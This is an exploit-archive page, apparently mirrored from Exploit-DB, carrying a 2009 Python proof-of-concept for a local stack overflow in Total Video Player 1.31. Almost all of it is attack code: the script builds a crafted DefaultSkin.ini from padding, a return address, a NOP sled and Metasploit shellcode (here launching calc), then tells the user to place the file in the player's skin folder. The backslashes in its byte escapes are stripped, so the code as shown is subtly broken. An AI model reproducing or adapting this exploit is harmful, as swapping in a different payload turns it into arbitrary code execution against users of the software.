Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit
# Published : 2009-01-20
# Author : His0k4
# Previous Title : Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit
# Next Title : OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit

#!/usr/bin/python
import socket
print "******************************************************"
print " Total Video Player V1.31 Local Stack Overflown"
print " Author: His0k4"
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)n"
print " dz-secure.comn snakespc.comn dz-security.net"
print "******************************************************"

header1 = (
	"x5Bx57x69x6Ex64x6Fx77x73x5Dx0Ax50x6Cx69x73x74x57"
	"x69x6Ex64x6Fx77x20x3Dx20x70x6Cx73x2Ex64x6Cx6Cx2C"
	"x49x44x0Ax0Ax5Bx4Dx61x69x6Ex57x69x6Ex64x6Fx77x53"
	"x43x52x45x45x4Ex5Dx4Dx61x69x6Ex3Dx4Ex6Fx72x6Dx61"
	"x6Cx2Ex62x6Dx70x0Ax0Ax5Bx50x6Cx69x73x74x57x69x6E"
	"x64x6Fx77x53x43x52x45x45x4Ex5Dx0Ax4Dx61x69x6Ex3D"
	"x50x4Cx42x75x74x74x6Fx6Ex4Ex6Fx72x6Dx61x6Cx2Ex62"
	"x6Dx70x0Ax0Ax5Bx50x6Cx69x73x74x57x69x6Ex64x6Fx77"
	"x4Cx49x53x54x43x54x52x4Cx53x54x59x4Cx45x5Dx0Ax43"
	"x6Fx6Cx75x6Dx6Ex48x65x61x64x65x72x53x70x61x6Ex3D")

header2=(
	"x2Ex62x6Dx70x0Ax56x65x72x74x69x63x6Cx65x53x63x72"
	"x6Fx6Cx6Cx42x61x72x54x68x75x6Dx62x3Dx56x65x72x74"
	"x69x63x6Cx65x53x63x72x6Fx6Cx6Cx42x61x72x54x68x75"
	"x6Dx62x2Ex62x6Dx70")

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
	"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xd5"
	"xc5x35xefx83xebxfcxe2xf4x29x2dx71xefxd5xc5xbexaa"
	"xe9x4ex49xeaxadxc4xdax64x9axddxbexb0xf5xc4xdexa6"
	"x5exf1xbexeex3bxf4xf5x76x79x41xf5x9bxd2x04xffxe2"
	"xd4x07xdex1bxeex91x11xebxa0x20xbexb0xf1xc4xdex89"
	"x5exc9x7ex64x8axd9x34x04x5exd9xbexeex3ex4cx69xcb"
	"xd1x06x04x2fxb1x4ex75xdfx50x05x4dxe3x5ex85x39x64"
	"xa5xd9x98x64xbdxcdxdexe6x5ex45x85xefxd5xc5xbex87"
	"xe9x9ax04x19xb5x93xbcx17x56x05x4exbfxbdx35xbfxeb"
	"x8axadxadx11x5fxcbx62x10x32xa6x54x83xb6xc5x35xef")
	
buffer = header1 + "x41"*221 + "x7CxE1xA7x7C" + "x90"*20 + shellcode + header2

try:
    out_file = open("DefaultSkin.ini",'w')
    out_file.write(buffer)
    out_file.close()
    print("n Exploit file created!, Now replace this file in SkinsDefaultSkin foldern and run the programn")
except:
    print "Error"

# www.Syue.com [2009-01-20]